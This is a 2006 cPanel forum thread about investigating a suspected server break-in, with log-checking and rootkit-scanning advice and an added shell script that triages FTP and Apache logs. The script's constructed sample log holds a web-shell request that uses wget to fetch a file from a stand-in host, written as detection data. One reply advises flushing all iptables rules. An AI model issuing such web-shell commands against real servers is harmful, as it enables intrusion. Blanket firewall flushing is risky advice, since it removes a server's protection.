The Community Forums

Interact with an entire community of cPanel & WHM users!

Hacker problem!

Discussion in 'General Discussion' started by KillaH425, Oct 4, 2006.

  1. KillaH425

    I am fairly sure that someone has hacked into our server either by exploit or by guessing our password. I want to find the logs of the FTP access, but I can't get them through cPanel. I downloaded the main file and it brings up a command prompt and then in the FTP Manager section I can't access the links at the bottom because they don't exist. Any suggestions?!
     
  2. designeru

    Hint!

    Try logging in to your console (ssh), go to /var/logs and search there:

    - xferlog - ftp log
    - /usr/local/apache/domlogs/ - search for wget or cmd
    - last - the last logins to your server

    Don't forget to run rkhunter and chkrootkit.
    Also, do a:
    # ps -auxf | grep nobody
    ... to see if there are any started processes.

    Go to /tmp and search for any suspicious files.

    If "the one" who broke into your server wasn't stupid enough, you won't find a thing.
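
The two log searches suggested in the post above (FTP uploads in xferlog, wget or cmd in the domlogs), written out as an added example that is not part of the original thread. The function names and all sample log lines are constructed for illustration; pass the functions the paths of your own xferlog and domlog files.

```shell
#!/bin/sh
# Added example: offline triage of the two log types named in the post above.
# All log lines below are constructed samples (documentation IP ranges).

# List files uploaded over FTP from an xferlog-format log: "host user path".
# Fields are counted from the end of the line: NF-6 is the direction
# (i = incoming upload, o = download), NF-4 is the FTP username.
ftp_uploads() {
    awk 'NF >= 18 && $(NF-6) == "i" { print $7, $(NF-4), $9 }' "$1"
}

# Count requests per client IP in an Apache access log (domlog) whose
# request line mentions wget or a cmd= parameter, busiest client first.
suspicious_requests() {
    awk -F'"' 'tolower($2) ~ /wget|cmd=/ { split($1, a, " "); n[a[1]]++ }
               END { for (ip in n) print n[ip], ip }' "$1" | sort -rn
}

# Write the constructed sample logs into directory $1.
write_samples() {
    cat > "$1/xferlog" <<'EOF'
Wed Oct  4 02:11:09 2006 1 203.0.113.7 4821 /home/site/public_html/images/x.php b _ i r site ftp 0 * c
Wed Oct  4 09:30:41 2006 2 198.51.100.20 10240 /home/site/public_html/index.html b _ o r site ftp 0 * c
EOF
    cat > "$1/domlog" <<'EOF'
203.0.113.7 - - [04/Oct/2006:02:12:30 -0400] "GET /images/x.php?cmd=id HTTP/1.1" 200 57 "-" "-"
203.0.113.7 - - [04/Oct/2006:02:12:48 -0400] "GET /images/x.php?cmd=wget%20http://192.0.2.1/a HTTP/1.1" 200 0 "-" "-"
198.51.100.20 - - [04/Oct/2006:09:31:02 -0400] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/4.0"
EOF
}

# Demo run on the constructed samples.
tmp=$(mktemp -d)
write_samples "$tmp"
echo "FTP uploads (host user path):"; ftp_uploads "$tmp/xferlog"
echo "wget/cmd requests per IP:";     suspicious_requests "$tmp/domlog"
rm -rf "$tmp"
```

An upload of a script into a web-served directory followed by requests to that same path from the same address is the pattern these two outputs are meant to be read together for.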
     
  3. KillaH425

    How do you login using SSH? And by the way, cPanel is installed on a local server and not WHM, in case that changes anything. I can still access the console, but I know someone banned IPs and screwed something up because now nothing works. Thanks.
     
  4. designeru

    Advice...

    > How do you login using SSH?
    google.com -> putty ssh

    This is a small tool that will let you connect to your Unix-based server from any Windows computer.

    > I can still access the console, but I know someone banned IPs and screwed something up because now nothing works.

    You mean you have direct access to that server? Do
    # iptables -F && iptables -F -t nat && iptables -F -t mangle
    ... if you don't have direct access to the server, ask your seller to do that. You will need ROOT ACCESS to do that, then log in from a Windows PC via SSH.
     
  5. KillaH425

    I am pretty positive this route would take weeks as it isn't hosted by a company. Instead it is hosted by someone that is hard to contact. I was hoping for an easier method.
     
  6. AndyReed

    If you are hosting your web site, you'll have to contact your host for help. If you have a dedicated server and need help, contact your Data Center, or seek professional help.
     
  7. Danny_T

    The /scripts/securetmp script will fix a lot of hack attempts; at least they can't run executables out of the tmp dirs. On a web hosting system there are always a lot of PHP applications that are leaky. Many webmasters don't update their PHP applications in time, or not at all.
    Now I see a lot of weird executables in my tmp dirs, but they are not started anymore :) That saved a lot of trouble, hehe.

    I only miss the securing of the shm device in that script (box is FC).

    Danny.
     